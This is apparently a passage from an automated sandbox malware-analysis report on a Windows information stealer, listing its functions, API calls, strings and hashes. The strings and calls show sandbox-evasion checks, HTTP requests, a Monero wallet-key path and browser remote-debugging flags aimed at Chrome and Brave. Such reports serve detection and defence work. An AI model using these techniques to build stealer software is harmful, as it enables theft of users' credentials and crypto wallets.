                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: 664a3c704ddf77a0eab3f0d8651398a63ad2491a91533efacb4a5612560b3ac2
                                    • Instruction ID: c09a2a34c15fc0e1327127c85ae158c9a522b4776166f1871f885b0426f0bc6e
                                    • Opcode Fuzzy Hash: 664a3c704ddf77a0eab3f0d8651398a63ad2491a91533efacb4a5612560b3ac2
                                    • Instruction Fuzzy Hash: C5312E70E04148ABCB04FBF2DC56BBE77F9AF24340F1049A9F11266292EF707909C662
                                    Function 00BD1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 bd1220-bd1247 call be8b40 GlobalMemoryStatusEx 1439 bd1249-bd1271 call bedd30 * 2 1436->1439 1440 bd1273-bd127a 1436->1440 1441 bd1281-bd1285 1439->1441 1440->1441 1443 bd129a-bd129d 1441->1443 1444 bd1287 1441->1444 1446 bd1289-bd1290 1444->1446 1447 bd1292-bd1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BD123E
                                    • __aulldiv.LIBCMT ref: 00BD1258
                                    • __aulldiv.LIBCMT ref: 00BD1266
                                    • ExitProcess.KERNEL32 ref: 00BD1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: 451b0d8a364d423232dcdd28f5f8d6b5c41bcf1f34960f48a9855a34cf0a5413
                                    • Instruction ID: aad073a306c94700c25b3c12ea091e2be50cf4d97855caeedf473f617da47514
                                    • Opcode Fuzzy Hash: 451b0d8a364d423232dcdd28f5f8d6b5c41bcf1f34960f48a9855a34cf0a5413
                                    • Instruction Fuzzy Hash: AD0112B0D44308FADF10DFE5CC4AB9DB7F8EB14705F208499E604B62C0D7B555458759
                                    Function 00BE6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1450 be6d93 1451 be6daa 1450->1451 1453 be6dac-be6dc2 call be6bc0 call be5d60 CloseHandle ExitProcess 1451->1453 1454 be6d5a-be6d77 call beade0 OpenEventA 1451->1454 1459 be6d79-be6d91 call beade0 CreateEventA 1454->1459 1460 be6d95-be6da4 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE6D99
                                    • Sleep.KERNEL32(00001770), ref: 00BE6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6DBA
                                    • ExitProcess.KERNEL32 ref: 00BE6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 045d69502f850d514f168561cabf9217102e68fda3d4319ad71e78f74c4edf8c
                                    • Instruction ID: 991abbd5afc2e5ae6af01b4fd9bc8f729dc5e305281f45c5c4e5c5d4c9db8aea
                                    • Opcode Fuzzy Hash: 045d69502f850d514f168561cabf9217102e68fda3d4319ad71e78f74c4edf8c
                                    • Instruction Fuzzy Hash: 79F05E30B48249EFEB10EBA2DC4ABBD33F4EF28781F5085A5B512A51A1CBB06504CA61
                                    Function 00BD4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 7e68c91ed1019a2bb4c75bb944a397ff91afc3aa2f2d9112d999462b9db29d5b
                                    • Instruction ID: 303f64208304f86664818927a09a8081ed59b6ea1e355a03e60722143dbb41de
                                    • Opcode Fuzzy Hash: 7e68c91ed1019a2bb4c75bb944a397ff91afc3aa2f2d9112d999462b9db29d5b
                                    • Instruction Fuzzy Hash: 35213EB1D00209ABDF14DFA5EC45ADE7BB9FB45320F108665F915A7280EB706A09CF91
                                    Function 00BE5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD62D0: InternetOpenA.WININET(00BF0DFF,00000001,00000000,00000000,00000000), ref: 00BD6331
                                      • Part of subcall function 00BD62D0: StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6353
                                      • Part of subcall function 00BD62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6385
                                      • Part of subcall function 00BD62D0: HttpOpenRequestA.WININET(00000000,GET,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD63D5
                                      • Part of subcall function 00BD62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BD640F
                                      • Part of subcall function 00BD62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD6421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: fcf85e5c14f5e877af0ab28db81788aace54a00bdcec0ad53fd9ff4adfabe05f
                                    • Instruction ID: 777a0b7adecfb8e1f962ab1c1c5efe216a693d2c12ee504746edcbcee2a991e7
                                    • Opcode Fuzzy Hash: fcf85e5c14f5e877af0ab28db81788aace54a00bdcec0ad53fd9ff4adfabe05f
                                    • Instruction Fuzzy Hash: 3411E230900148AADB14FFB5DD92AED77BD9F50340F4145E4E51A57592EF30BB08CA51
                                    Function 00BE7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00BE7ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: f1ca64bb06b0249e77d71fa132a0f1725ad5a1f2db925b2d58712817b0fef152
                                    • Instruction ID: e7e9d8e939867dbdea15f84121c0b34e9e1d6f980b3597dc8d6748d0dac4e080
                                    • Opcode Fuzzy Hash: f1ca64bb06b0249e77d71fa132a0f1725ad5a1f2db925b2d58712817b0fef152
                                    • Instruction Fuzzy Hash: C101D6B1A48249AFC700CF9ADC85FAEBBF8F705710F100169F605E3290D7B45A0487A1
                                    Function 00BD1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BD112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BD1132
                                    • ExitProcess.KERNEL32 ref: 00BD1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: efeab70414bbab97334714fd9d5aefa66fe85721ca0b91a837ae7ca5cc8666a8
                                    • Instruction ID: 395a25a10d48f305f56e3363bbef0aae1c0a73df93c2c03ae683c08b8d78f381
                                    • Opcode Fuzzy Hash: efeab70414bbab97334714fd9d5aefa66fe85721ca0b91a837ae7ca5cc8666a8
                                    • Instruction Fuzzy Hash: 5FE08670A49308FFE710AB919C0AB0C7AA8DB09B01F100085F708761D0D6B435448658
                                    Function 00BD10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BD10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BD10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 3ed52f6b0fe1a6350586ce7c228a6263508781a32fee3d068a60db75e4ddfc7b
                                    • Instruction ID: 35d0469e6e5780493db565d05dad670bfe70579386e074129b24d63ce512af1e
                                    • Opcode Fuzzy Hash: 3ed52f6b0fe1a6350586ce7c228a6263508781a32fee3d068a60db75e4ddfc7b
                                    • Instruction Fuzzy Hash: 09F0E9B1641204BBE71496B99C59FAEB7D8E705704F300845F544E7280D571AE048AA0
                                    Function 00BD1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BE7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7AA0
                                      • Part of subcall function 00BE7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7AA7
                                      • Part of subcall function 00BE7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BE7ABF
                                      • Part of subcall function 00BE79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BD11B7), ref: 00BE7A10
                                      • Part of subcall function 00BE79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7A17
                                      • Part of subcall function 00BE79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BE7A2F
                                    • ExitProcess.KERNEL32 ref: 00BD11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 2c59f5097bcb0dd4aacaf2b4bfe855128dc233377dfa16810c7abc25c3157073
                                    • Instruction ID: 7f019a0a922e21d3833257bd2270850c244530c8a10a769294cba789946c7436
                                    • Opcode Fuzzy Hash: 2c59f5097bcb0dd4aacaf2b4bfe855128dc233377dfa16810c7abc25c3157073
                                    • Instruction Fuzzy Hash: A9E012A9E443416BCA10B7B77C07B1B72CC9B5930AF040895F908A2202FF25F8048165

                                    Non-executed Functions

                                    Function 00BDBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00BF0B32,00BF0B2F,00000000,?,?,?,00BF1450,00BF0B2E), ref: 00BDBEC5
                                    • StrCmpCA.SHLWAPI(?,00BF1454), ref: 00BDBF33
                                    • StrCmpCA.SHLWAPI(?,00BF1458), ref: 00BDBF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDC8A9
                                    • FindClose.KERNEL32(000000FF), ref: 00BDC8BB
                                    Strings
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BDC534
                                    • \Brave\Preferences, xrefs: 00BDC1C1
                                    • Brave, xrefs: 00BDC0E8
                                    • Google Chrome, xrefs: 00BDC6F8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BDC3B2
                                    • Preferences, xrefs: 00BDC104
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BDC495
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
